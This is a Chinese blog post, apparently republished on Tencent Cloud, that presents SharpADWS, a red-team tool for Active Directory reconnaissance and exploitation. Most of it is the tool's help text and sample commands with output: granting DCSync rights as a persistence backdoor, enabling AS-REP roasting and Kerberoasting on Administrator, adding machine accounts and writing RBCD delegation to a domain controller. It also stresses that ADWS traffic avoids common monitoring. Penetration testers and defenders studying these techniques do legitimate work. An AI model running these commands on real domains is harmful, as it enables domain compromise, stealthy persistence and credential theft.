【神兵利器】红队Active Directory侦察利用工具
【神兵利器】红队Active Directory侦察利用工具
Al1ex
发布于 2025-01-07 10:16:58
发布于 2025-01-07 10:16:58
代码可运行
运行总次数:0
代码可运行
项目介绍
SharpADWS 是一个为 Red Teams 打造的 Active Directory 侦查和利用工具,其通过 Active Directory Web Services (ADWS) 协议收集并修改 Active Directory 数据。
通常情况下,枚举或操作 Active Directory 是通过 LDAP 协议进行的。SharpADWS 能够在不直接与 LDAP 服务器通信的情况下提取或修改 Active Directory 数据。在 ADWS 下,LDAP 查询被包装在一系列 SOAP 消息中,然后使用 NET TCP Binding 加密信道将它们发送到 ADWS 服务器。随后ADWS 服务器在其本地解包 LDAP 查询并将其转发到运行在同一域控制器上的 LDAP 服务器
项目优点
使用 ADWS 进行 LDAP 后利用的主要好处之一是它相对不为人所知,由于 LDAP 流量不会通过网络发送,因此不容易被常见的监控工具检测到。ADWS 运行与 LDAP 完全不同的服务,可在 TCP 端口 9389 上使用,并使用 SOAP 协议作为其接口。
在研究 ADWS 时,我们注意到,由于它是 SOAP Web 服务,因此实际执行的 LDAP 查询是在域控制器本地完成的。这提供了许多有趣的副作用,结果证明是有利的。比如,在分析域控制器上的 LDAP 查询时,您可能会注意到查询源自 127.0.0.1日志,在许多情况下它们将被忽视
协议实现
SharpADWS 实现了 MS-ADDM、MS-WSTIM 和 MS-WSDS 协议的相关细节,您可以借助该项目的源码,轻松实现对 Active Directory Web Services 的以下操作:
- Enumerate:创建与指定的搜索查询过滤器相映射的上下文
- Pull:在特定枚举的上下文中检索结果对象
- Renew:更新指定枚举上下文的过期时间
- GetStatus:获取指定枚举上下文的过期时间。
- Release:释放指定的枚举上下文。
- Delete:删除现有的对象。
- Get:从对象中检索一个或多个属性。
- Put:修改对象上的一个或多个属性的内容。
- Add:将指定的属性值添加到指定属性的值集中,如果目标对象上尚不存在该属性,则创建该属性。
- Replace:用操作中指定的值替换指定属性中的值集,如果目标对象上尚不存在该属性,则创建该属性。如果操作中没有指定值,则将删除当前指定属性上的所有值。
- Delete:从指定的属性中删除指定的属性值。如果没有指定值,则将删除所有值。如果目标对象上不存在指定的属性,则 PUT 请求失败。
- Create:创建一个新的对象
工具使用
命令行参数-h可用于显示以下使用信息:
C:\Users\Marcus>SharpADWS.exe -h
SharpADWS 1.0.0-beta - Copyright (c) 2024 WHOAMI (whoamianony.top)
-h Display this help screen
Connection options:
-d Specify domain for enumeration
-u Username to use for ADWS Connection
-p Password to use for ADWS Connection
Supported methods:
Cache Dump all objectSids to cache file for Acl methods
Acl Enumerate and analyze DACLs for specified objects, specifically Users, Computers, Groups, Domains, DomainControllers and GPOs
DCSync Enumerate all DCSync-capable accounts and can set DCSync backdoors
DontReqPreAuth Enumerates all accounts that do not require kerberos preauthentication, and can enable this option for accounts
Kerberoastable Enumerates all Kerberoastable accounts, and can write SPNs for accounts
AddComputer Add a machine account within the scope of ms-DS-MachineAccountQuota for RBCD attack
RBCD Read, write and remove msDS-AllowedToActOnBehalfOfOtherIdentity attributes for Resource-Based Constrained Delegation attack
Certify Enumerate all ADCS data like Certify.exe, and can write template attributes
Whisker List, add and remove msDS-KeyCredentialLink attribute like Whisker.exe for ShadowCredentials attack
FindDelegation Enumerate all delegation relationships for the target domain
Acl options:
-dn RFC 2253 DN to base search from
-scope Set your Scope, support Base (Default), Onelevel, Subtree
-trustee The sAMAccountName of a security principal to check for its effective permissions
-right Filter DACL for a specific AD rights
-rid Specify a rid value and filter out DACL that security principal's rid is greater than it
-user Enumerate DACL for all user objects
-computer Enumerate DACL for all computer objects
-group Enumerate DACL for all group objects
-domain Enumerate DACL for all domain objects
-domaincontroller Enumerate DACL for all domain controller objects
-gpo Enumerate DACL for all gpo objects
DCSync options:
-action [{list, write}] Action to operate on DCSync method
list List all accounts with DCSync permissions
write Escalate accounts with DCSync permissions
-target Specify the sAMAccountName of the account
DontReqPreAuth options:
-action [{list, write}] Action to operate on DontReqPreAuth method
list List all accounts that do not require kerberos preauthentication
write Enable do not require kerberos preauthentication for an account
-target Specify the sAMAccountName of the account
Kerberoastable options:
-action [{list, write}] Action to operate on Kerberoastable method
list List all kerberoastable accounts
write Write SPNs for an account to kerberoast
-target Specify the sAMAccountName of the account
AddComputer options:
-computer-name Name of computer to add, without '$' suffix
-computer-pass Password to set for the computer
RBCD options:
-action [{read,write,remove}]
Action to operate on RBCD method
read Read the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the account
write Write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the account
remove Remove the msDS-AllowedToActOnBehalfOfOtherIdentity attribute value of the account added by the write action
Certify options:
-action [{find, modify}]
Action to operate on Certify method
find Find all CA and certificate templates
modify Modify certificate templates
-enrolleeSuppliesSubject
Enumerate certificate templates with CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag for find action,
and can enable CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag for modify action
-clientAuth Enumerate certificate templates with client authentication pKIExtendedKeyUsage for find action,
and can enable Client Authentication for modify action
Whisker options:
-action [{list, add, remove}]
Action to operate on ShadowCredentials method
list List all the values of the msDS-KeyCredentialLink attribute for an account
add Add a new value to the msDS-KeyCredentialLink attribute for an account
remove Remove a value from the msDS-KeyCredentialLink attribute for an account
-device-id Specify the DeviceID to remove
-target Specify the sAMAccountName of the account
FindDelegation options:
No options, just run!
Cache
SharpADWS 在枚举 ACL 时,为了不对每个未知的受托者对象执行额外的 ADWS 请求,需要提前通过 cache method 创建所有账户对象的完整缓存并将其保存到文件中,从而避免产生大量(不必要的)流量。该缓存包含当前域内每个账户对象名称与其 objectSid 的映射
C:\Users\Marcus>SharpADWS.exe Cache
[*] Cache file has been generated: object.cache
ACL
Acl method 能够枚举指定 -dn 的对象的 DACL,并且支持通过 -trustee、-right 和 -rid 参数对枚举出的 DACL 进行筛选。比如,我们要枚举所有的 Domain Controller 对象,并筛选出受托者为 Marcus 的 DACL,如下所示:
C:\Users\Marcus>SharpADWS.exe acl -dn "OU=Domain Controllers,DC=corp,DC=local" -scope Subtree -trustee Marcus
Severity : Critical
ObjectDN : CN=DC01,OU=Domain Controllers,DC=corp,DC=local
AccessControlType : Allow
ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
ObjectType : All
Trustee : Marcus
IsInherited : False
比如,我们要枚举所有的 User 对象,并筛选出权限为 GenericWrite,受托者的 RID 大于 1000 的 DACL,如下所示:
C:\Users\Marcus>SharpADWS.exe acl -dn "CN=Users,DC=corp,DC=local" -scope Subtree -right Generic -rid 1000
Severity : Critical
ObjectDN : CN=Bob,CN=Users,DC=corp,DC=local
AccessControlType : Allow
ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
ObjectType : All
Trustee : Marcus
IsInherited : False
此外,Acl method 还支持对特定对象的枚举:
SharpADWS.exe acl -user # Enumerate DACL for all user objects
SharpADWS.exe acl -computer # Enumerate DACL for all computer objects
SharpADWS.exe acl -group # Enumerate DACL for all group objects
SharpADWS.exe acl -domain # Enumerate DACL for all domain objects
SharpADWS.exe acl -domaincontroller # Enumerate DACL for all domain controller objects
SharpADWS.exe acl -gpo # Enumerate DACL for all gpo objects需要注意的是,Acl Method 的使用必须依赖于已经通过 Cache Method 建立的映射缓存。
DCSync
DCSync method 的 list 能够查询出所有被授予了 DS-Replication-Get-Changes、DS-Replication-Get-Changes-All 和 DS-Replication-Get-Changes-In-Filtered-Set 权限的账户,如下所示:
C:\Users\Marcus>SharpADWS.exe DCSync -action list
Severity : Info
ObjectDN : DC=corp,DC=local
AccessControlType : Allow
ActiveDirectoryRights : ExtendedRight
ObjectType : DS-Replication-Get-Changes-All
Trustee : Administrators
IsInherited : False
Severity : Info
ObjectDN : DC=corp,DC=local
AccessControlType : Allow
ActiveDirectoryRights : ExtendedRight
ObjectType : DS-Replication-Get-Changes-All
Trustee : Domain Controllers
IsInherited : False
Severity : Critical
ObjectDN : DC=corp,DC=local
AccessControlType : Allow
ActiveDirectoryRights : ExtendedRight
ObjectType : DS-Replication-Get-Changes-All
Trustee : Alice
IsInherited : False
此外,在拥有足够权限的情况下,您可以通过 write 为某个账户授予 DCSync 权限,以建立域持久性后门:
C:\Users\Marcus>SharpADWS.exe DCSync -action write -target Marcus
[*] Account Marcus now has DCSync privieges on the domain.
DontReqPreAuth
DontReqPreAuth method 的 list 能够查找出所有设置了 “Do not require kerberos preauthentication” 选项的账户,如下所示:
C:\Users\Marcus>SharpADWS.exe DontReqPreAuth -action list
[*] Found users that do not require kerberos preauthentication:
[*] CN=Bob,CN=Users,DC=corp,DC=local
[*] CN=Alice,CN=Users,DC=corp,DC=local
[*] CN=John,CN=Users,DC=corp,DC=local
此外您可以滥用对目标账户 userAccountControl 属性的 WriteProperty 权限,通过 write 为该账户启用 “Do not require kerberos preauthentication” 选项,以执行 AS-REP Roasting 攻击:
C:\Users\Marcus>SharpADWS.exe DontReqPreAuth -action write -target Administrator
[*] Set DontReqPreAuth for user Administrator successfully!
Kerberoastable
Kerberoastable method 的 list 能够查找出所有设置了 SPN 的账户,如下所示:
C:\Users\Marcus>SharpADWS.exe Kerberoastable -action list
[*] Found kerberoastable users:
[*] CN=krbtgt,CN=Users,DC=corp,DC=local
[*] kadmin/changepw
[*] CN=Bob,CN=Users,DC=corp,DC=local
[*] WWW/win-iisserver.corp.local/IIS
[*] TERMSERV/win-iisserver.corp.local
[*] CN=John,CN=Users,DC=corp,DC=local
[*] TERMSERV/WIN-SERVER2026
此外,您可以滥用对目标账户 servicePrincipalName 属性的 WriteProperty 权限,通过 write 为该账户(仅限于用户账户)添加一个 SPN,以执行 Kerberoasting 攻击
C:\Users\Marcus>SharpADWS.exe Kerberoastable -action write -target Administrator
[*] Kerberoast user Administrator successfully!
AddComputer
AddComputer method 允许您在 ms-DS-MachineAccountQuota 属性值限制的范围内创建一个新的计算机账户,该极其账户可用于后续的 RBCD 攻击中使用
C:\Users\Marcus>SharpADWS.exe AddComputer -computer-name PENTEST$ -computer-pass Passw0rd
[*] Successfully added machine account PENTEST$ with password Passw0rd.
RBCD
RBCD method 的read能够读取指定账户对象的msDS-AllowedToActOnBehalfOfOtherIdentity 属性值,以检查谁有权限对该账户进行资源委派,如下所示:
C:\Users\Marcus>SharpADWS.exe RBCD -action read -delegate-to DC01$
[*] Accounts allowed to act on behalf of other identity:
[*] WIN-IISSERVER$ (S-1-5-21-1315326963-2851134370-1073178800-1106)
[*] WIN-MSSQL$ (S-1-5-21-1315326963-2851134370-1073178800-1103)
[*] WIN-PC8087$ (S-1-5-21-1315326963-2851134370-1073178800-1117)
RBCD method 的 write 能够写入目标账户对象的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性,以进行 Resource-Based Constrained Delegation 攻击。如下所示,我们首先用 AddComputer method 创建了一个新的极其账户 PENTEST,然后我们可以执行以下命令,将 PENTEST 的 SID 写入 DC01
C:\Users\Marcus>SharpADWS.exe RBCD -action write -delegate-to DC01$ -delegate-from PENTEST$
[*] Delegation rights modified successfully!
[*] PENTEST$ can now impersonate users on DC01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] PENTEST$ (S-1-5-21-1315326963-2851134370-1073178800-1113)
此外,通过 remove 可以将 write 中添加的 SID 从目标对象的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性中移除:
C:\Users\Marcus>SharpADWS.exe RBCD -action remove -delegate-to DC01$ -delegate-from PENTEST$
[*] Delegation rights modified successfully!
[*] Accounts allowed to act on behalf of other identity has been removed:
[*] PENTEST$ (S-1-5-21-1315326963-2851134370-1073178800-1113)
Certify
Certify method 的 find 能够像 Certify 一样枚举 ADCS 中的数据,包括所有的证书颁发机构和证书模版:
C:\Users\Marcus>SharpADWS.exe Certify -action find
[*] Find CA and certificate templates
[*] Using the search base 'CN=Configuration,DC=corp,DC=local'
[*] Listing info about the Enterprise CA 'corp-DC01-CA'
Enterprise CA Name : corp-DC01-CA
DNS Name : DC01.corp.local
FullName : DC01.corp.local\corp-DC01-CA
Certificate Subject : CN=corp-DC01-CA, DC=corp, DC=local
Certificate Serial Number : 2D975C2D49AE4BB7432682E1708C8834
Certificate Validity Start : 2/13/2024 5:55:36 PM
Certificate Validity End : 2/13/2029 6:05:36 PM
CA Permissions :
Enrollment Rights :
: Authenticated Users
Object Control Permissions :
ManageCA :
: Enterprise Admins
: DC01
: Domain Admins
ManageCertificates :
: Enterprise Admins
: DC01
WriteDacl :
: Enterprise Admins
: DC01
: Domain Admins
WriteOwner :
: Enterprise Admins
: DC01
: Domain Admins
WriteProperty :
: Enterprise Admins
: DC01
: Domain Admins
[*] Available Certificates Templates
CA Name : CORP-DC01-CA
Template Name : User
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
pKIExtendedKeyUsage : Encrypting File System Secure Email Client Authentication
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN SUBJECT_ALT_REQUIRE_EMAIL SUBJECT_REQUIRE_EMAIL SUBJECT_REQUIRE_DIRECTORY_PATH
msPkI-Enrollment-Flag : INCLUDE_SYMMETRIC_ALGORITHMS PUBLISH_TO_DS AUTO_ENROLLMENT
msPKI-Private-Key-Flag : EXPORTABLE_KEY
CA Permissions :
Enrollment Rights :
: Domain Admins
: Domain Users
: Enterprise Admins
Object Control Permissions :
WriteDacl :
: Domain Admins
: Enterprise Admins
WriteOwner :
: Domain Admins
: Enterprise Admins
WriteProperty :
: Domain Admins
: Enterprise Admins
: Domain Users
CA Name :
Template Name : UserSignature
Enabled : False
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
pKIExtendedKeyUsage : Secure Email Client Authentication
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN SUBJECT_ALT_REQUIRE_EMAIL SUBJECT_REQUIRE_EMAIL SUBJECT_REQUIRE_DIRECTORY_PATH
msPkI-Enrollment-Flag : AUTO_ENROLLMENT
msPKI-Private-Key-Flag : ATTEST_NONE
CA Permissions :
Enrollment Rights :
: Domain Admins
: Domain Users
: Enterprise Admins
Object Control Permissions :
WriteDacl :
: Domain Admins
: Enterprise Admins
WriteOwner :
: Domain Admins
: Enterprise Admins
WriteProperty :
: Domain Admins
: Enterprise Admins
: Domain Users
# ...此外find支持-enrolleeSuppliesSubject 和 -clientAuth 选项,能够筛选出所有开启了 CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT 标志和支持 Client Authentication 的证书模版:
C:\Users\Marcus>SharpADWS.exe Certify -action find -enrolleeSuppliesSubject -clientAuth
[*] Find CA and certificate templates
[*] Using the search base 'CN=Configuration,DC=corp,DC=local'
[*] Listing info about the Enterprise CA 'corp-DC01-CA'
# ...
[*] Available Certificates Templates
CA Name : CORP-DC01-CA
Template Name : User
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
pKIExtendedKeyUsage : Encrypting File System Secure Email Client Authentication
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT SUBJECT_ALT_REQUIRE_UPN SUBJECT_ALT_REQUIRE_EMAIL SUBJECT_REQUIRE_EMAIL SUBJECT_REQUIRE_DIRECTORY_PATH
msPkI-Enrollment-Flag : INCLUDE_SYMMETRIC_ALGORITHMS PUBLISH_TO_DS AUTO_ENROLLMENT
msPKI-Private-Key-Flag : EXPORTABLE_KEY
CA Permissions :
Enrollment Rights :
: Domain Admins
: Domain Users
: Enterprise Admins
Object Control Permissions :
WriteDacl :
: Domain Admins
: Enterprise Admins
WriteOwner :
: Domain Admins
: Enterprise Admins
WriteProperty :
: Domain Admins
: Enterprise Admins
: Marcus
: Domain Users
# ...免责声明
仅限用于技术研究和获得正式授权的攻防项目,请使用者遵守《中华人民共和国网络安全法》,切勿用于任何非法活动,若将工具做其他用途,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律连带责任
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-01-04,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
